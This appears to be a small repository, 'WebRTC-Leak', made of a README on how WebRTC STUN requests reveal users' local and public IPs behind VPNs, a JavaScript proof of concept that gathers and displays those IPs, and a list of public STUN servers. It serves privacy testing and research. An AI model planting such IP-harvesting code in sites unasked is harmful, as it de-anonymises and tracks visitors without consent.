├── README.md ├── exploit.js └── stunserverlist.txt /README.md: -------------------------------------------------------------------------------- 1 | # WebRTC-Leak 2 | Check if your VPN leaks your IP address via the WebRTC technology. 3 | 4 | # 23% of tested VPNs leaks users' IPs 5 | 6 | ## WebRTC 7 | 8 | Browsers have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo: https://ip.voidsec.com/ is an example implementation of that. 9 | 10 | Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console and cannot be blocked by plugins such as AdBlockPlus or Ghostery. This makes these types of requests available for online tracking, de-anonymize and trace users behind common privacy protection services such as: VPN, SOCKS Proxy, HTTP Proxy and (in the past) TOR users. 11 | 12 | Read my research on: https://voidsec.com/vpn-leak 13 | -------------------------------------------------------------------------------- /exploit.js: -------------------------------------------------------------------------------- 1 | function findIP(onNewIP) { 2 | var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; 3 | var pc = new myPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]}), 4 | noop = function() {}, 5 | localIPs = {}, 6 | ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g, 7 | key; 8 | 9 | function ipIterate(ip) { 10 | if (!localIPs[ip]) onNewIP(ip); 11 | localIPs[ip] = true; 12 | } 13 | 14 | pc.createDataChannel(""); 15 | 16 | pc.createOffer(function(sdp) { 17 | sdp.sdp.split('\n').forEach(function(line) { 18 | if (line.indexOf('candidate') < 0) return; 19 | line.match(ipRegex).forEach(ipIterate); 20 | }); 21 | pc.setLocalDescription(sdp, noop, noop); 22 | }, noop); 23 | 24 | pc.onicecandidate = function(ice) { 25 | if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return; 26 | ice.candidate.candidate.match(ipRegex).forEach(ipIterate); 27 | }; 28 | } 29 | 30 | 31 | 32 | var ul = document.createElement('ul'); 33 | ul.textContent = 'Your IPs are: ' 34 | document.body.appendChild(ul); 35 | 36 | function addIP(ip) { 37 | console.log('got ip: ', ip); 38 | var li = document.createElement('li'); 39 | li.textContent = ip; 40 | ul.appendChild(li); 41 | } 42 | 43 | findIP(addIP); -------------------------------------------------------------------------------- /stunserverlist.txt: -------------------------------------------------------------------------------- 1 | 23.21.150.121:3478 2 | iphone-stun.strato-iphone.de:3478 3 | numb.viagenie.ca:3478 4 | s1.taraba.net:3478 5 | s2.taraba.net:3478 6 | stun.12connect.com:3478 7 | stun.12voip.com:3478 8 | stun.1und1.de:3478 9 | stun.2talk.co.nz:3478 10 | stun.2talk.com:3478 11 | stun.3clogic.com:3478 12 | stun.3cx.com:3478 13 | stun.a-mm.tv:3478 14 | stun.aa.net.uk:3478 15 | stun.acrobits.cz:3478 16 | stun.actionvoip.com:3478 17 | stun.advfn.com:3478 18 | stun.aeta-audio.com:3478 19 | stun.aeta.com:3478 20 | stun.alltel.com.au:3478 21 | stun.altar.com.pl:3478 22 | stun.annatel.net:3478 23 | stun.antisip.com:3478 24 | stun.arbuz.ru:3478 25 | stun.avigora.com:3478 26 | stun.avigora.fr:3478 27 | stun.awa-shima.com:3478 28 | stun.awt.be:3478 29 | stun.b2b2c.ca:3478 30 | stun.bahnhof.net:3478 31 | stun.barracuda.com:3478 32 | stun.bluesip.net:3478 33 | stun.bmwgs.cz:3478 34 | stun.botonakis.com:3478 35 | stun.budgetphone.nl:3478 36 | stun.budgetsip.com:3478 37 | stun.cablenet-as.net:3478 38 | stun.callromania.ro:3478 39 | stun.callwithus.com:3478 40 | stun.cbsys.net:3478 41 | stun.chathelp.ru:3478 42 | stun.cheapvoip.com:3478 43 | stun.ciktel.com:3478 44 | stun.cloopen.com:3478 45 | stun.colouredlines.com.au:3478 46 | stun.comfi.com:3478 47 | stun.commpeak.com:3478 48 | stun.comtube.com:3478 49 | stun.comtube.ru:3478 50 | stun.cope.es:3478 51 | stun.counterpath.com:3478 52 | stun.counterpath.net:3478 53 | stun.cryptonit.net:3478 54 | stun.darioflaccovio.it:3478 55 | stun.datamanagement.it:3478 56 | stun.dcalling.de:3478 57 | stun.decanet.fr:3478 58 | stun.demos.ru:3478 59 | stun.develz.org:3478 60 | stun.dingaling.ca:3478 61 | stun.doublerobotics.com:3478 62 | stun.drogon.net:3478 63 | stun.duocom.es:3478 64 | stun.dus.net:3478 65 | stun.e-fon.ch:3478 66 | stun.easybell.de:3478 67 | stun.easycall.pl:3478 68 | stun.easyvoip.com:3478 69 | stun.efficace-factory.com:3478 70 | stun.einsundeins.com:3478 71 | stun.einsundeins.de:3478 72 | stun.ekiga.net:3478 73 | stun.epygi.com:3478 74 | stun.etoilediese.fr:3478 75 | stun.eyeball.com:3478 76 | stun.faktortel.com.au:3478 77 | stun.freecall.com:3478 78 | stun.freeswitch.org:3478 79 | stun.freevoipdeal.com:3478 80 | stun.fuzemeeting.com:3478 81 | stun.gmx.de:3478 82 | stun.gmx.net:3478 83 | stun.gradwell.com:3478 84 | stun.halonet.pl:3478 85 | stun.hellonanu.com:3478 86 | stun.hoiio.com:3478 87 | stun.hosteurope.de:3478 88 | stun.ideasip.com:3478 89 | stun.imesh.com:3478 90 | stun.infra.net:3478 91 | stun.internetcalls.com:3478 92 | stun.intervoip.com:3478 93 | stun.ipcomms.net:3478 94 | stun.ipfire.org:3478 95 | stun.ippi.fr:3478 96 | stun.ipshka.com:3478 97 | stun.iptel.org:3478 98 | stun.irian.at:3478 99 | stun.it1.hr:3478 100 | stun.ivao.aero:3478 101 | stun.jappix.com:3478 102 | stun.jumblo.com:3478 103 | stun.justvoip.com:3478 104 | stun.kanet.ru:3478 105 | stun.kiwilink.co.nz:3478 106 | stun.kundenserver.de:3478 107 | stun.l.google.com:19302 108 | stun.linea7.net:3478 109 | stun.linphone.org:3478 110 | stun.liveo.fr:3478 111 | stun.lowratevoip.com:3478 112 | stun.lugosoft.com:3478 113 | stun.lundimatin.fr:3478 114 | stun.magnet.ie:3478 115 | stun.manle.com:3478 116 | stun.mgn.ru:3478 117 | stun.mit.de:3478 118 | stun.mitake.com.tw:3478 119 | stun.miwifi.com:3478 120 | stun.modulus.gr:3478 121 | stun.mozcom.com:3478 122 | stun.myvoiptraffic.com:3478 123 | stun.mywatson.it:3478 124 | stun.nas.net:3478 125 | stun.neotel.co.za:3478 126 | stun.netappel.com:3478 127 | stun.netappel.fr:3478 128 | stun.netgsm.com.tr:3478 129 | stun.nfon.net:3478 130 | stun.noblogs.org:3478 131 | stun.noc.ams-ix.net:3478 132 | stun.node4.co.uk:3478 133 | stun.nonoh.net:3478 134 | stun.nottingham.ac.uk:3478 135 | stun.nova.is:3478 136 | stun.nventure.com:3478 137 | stun.on.net.mk:3478 138 | stun.ooma.com:3478 139 | stun.ooonet.ru:3478 140 | stun.oriontelekom.rs:3478 141 | stun.outland-net.de:3478 142 | stun.ozekiphone.com:3478 143 | stun.patlive.com:3478 144 | stun.personal-voip.de:3478 145 | stun.petcube.com:3478 146 | stun.phone.com:3478 147 | stun.phoneserve.com:3478 148 | stun.pjsip.org:3478 149 | stun.poivy.com:3478 150 | stun.powerpbx.org:3478 151 | stun.powervoip.com:3478 152 | stun.ppdi.com:3478 153 | stun.prizee.com:3478 154 | stun.qq.com:3478 155 | stun.qvod.com:3478 156 | stun.rackco.com:3478 157 | stun.rapidnet.de:3478 158 | stun.rb-net.com:3478 159 | stun.refint.net:3478 160 | stun.remote-learner.net:3478 161 | stun.rixtelecom.se:3478 162 | stun.rockenstein.de:3478 163 | stun.rolmail.net:3478 164 | stun.rounds.com:3478 165 | stun.rynga.com:3478 166 | stun.samsungsmartcam.com:3478 167 | stun.schlund.de:3478 168 | stun.services.mozilla.com:3478 169 | stun.sigmavoip.com:3478 170 | stun.sip.us:3478 171 | stun.sipdiscount.com:3478 172 | stun.sipgate.net:10000 173 | stun.sipgate.net:3478 174 | stun.siplogin.de:3478 175 | stun.sipnet.net:3478 176 | stun.sipnet.ru:3478 177 | stun.siportal.it:3478 178 | stun.sippeer.dk:3478 179 | stun.siptraffic.com:3478 180 | stun.skylink.ru:3478 181 | stun.sma.de:3478 182 | stun.smartvoip.com:3478 183 | stun.smsdiscount.com:3478 184 | stun.snafu.de:3478 185 | stun.softjoys.com:3478 186 | stun.solcon.nl:3478 187 | stun.solnet.ch:3478 188 | stun.sonetel.com:3478 189 | stun.sonetel.net:3478 190 | stun.sovtest.ru:3478 191 | stun.speedy.com.ar:3478 192 | stun.spokn.com:3478 193 | stun.srce.hr:3478 194 | stun.ssl7.net:3478 195 | stun.stunprotocol.org:3478 196 | stun.symform.com:3478 197 | stun.symplicity.com:3478 198 | stun.sysadminman.net:3478 199 | stun.t-online.de:3478 200 | stun.tagan.ru:3478 201 | stun.tatneft.ru:3478 202 | stun.teachercreated.com:3478 203 | stun.tel.lu:3478 204 | stun.telbo.com:3478 205 | stun.telefacil.com:3478 206 | stun.tis-dialog.ru:3478 207 | stun.tng.de:3478 208 | stun.twt.it:3478 209 | stun.u-blox.com:3478 210 | stun.ucallweconn.net:3478 211 | stun.ucsb.edu:3478 212 | stun.ucw.cz:3478 213 | stun.uls.co.za:3478 214 | stun.unseen.is:3478 215 | stun.usfamily.net:3478 216 | stun.veoh.com:3478 217 | stun.vidyo.com:3478 218 | stun.vipgroup.net:3478 219 | stun.virtual-call.com:3478 220 | stun.viva.gr:3478 221 | stun.vivox.com:3478 222 | stun.vline.com:3478 223 | stun.vo.lu:3478 224 | stun.vodafone.ro:3478 225 | stun.voicetrading.com:3478 226 | stun.voip.aebc.com:3478 227 | stun.voip.blackberry.com:3478 228 | stun.voip.eutelia.it:3478 229 | stun.voiparound.com:3478 230 | stun.voipblast.com:3478 231 | stun.voipbuster.com:3478 232 | stun.voipbusterpro.com:3478 233 | stun.voipcheap.co.uk:3478 234 | stun.voipcheap.com:3478 235 | stun.voipfibre.com:3478 236 | stun.voipgain.com:3478 237 | stun.voipgate.com:3478 238 | stun.voipinfocenter.com:3478 239 | stun.voipplanet.nl:3478 240 | stun.voippro.com:3478 241 | stun.voipraider.com:3478 242 | stun.voipstunt.com:3478 243 | stun.voipwise.com:3478 244 | stun.voipzoom.com:3478 245 | stun.vopium.com:3478 246 | stun.voxgratia.org:3478 247 | stun.voxox.com:3478 248 | stun.voys.nl:3478 249 | stun.voztele.com:3478 250 | stun.vyke.com:3478 251 | stun.webcalldirect.com:3478 252 | stun.whoi.edu:3478 253 | stun.wifirst.net:3478 254 | stun.wwdl.net:3478 255 | stun.xs4all.nl:3478 256 | stun.xtratelecom.es:3478 257 | stun.yesss.at:3478 258 | stun.zadarma.com:3478 259 | stun.zadv.com:3478 260 | stun.zoiper.com:3478 261 | stun1.faktortel.com.au:3478 262 | stun1.l.google.com:19302 263 | stun1.voiceeclipse.net:3478 264 | stun2.l.google.com:19302 265 | stun3.l.google.com:19302 266 | stun4.l.google.com:19302 267 | stunserver.org:3478 268 | --------------------------------------------------------------------------------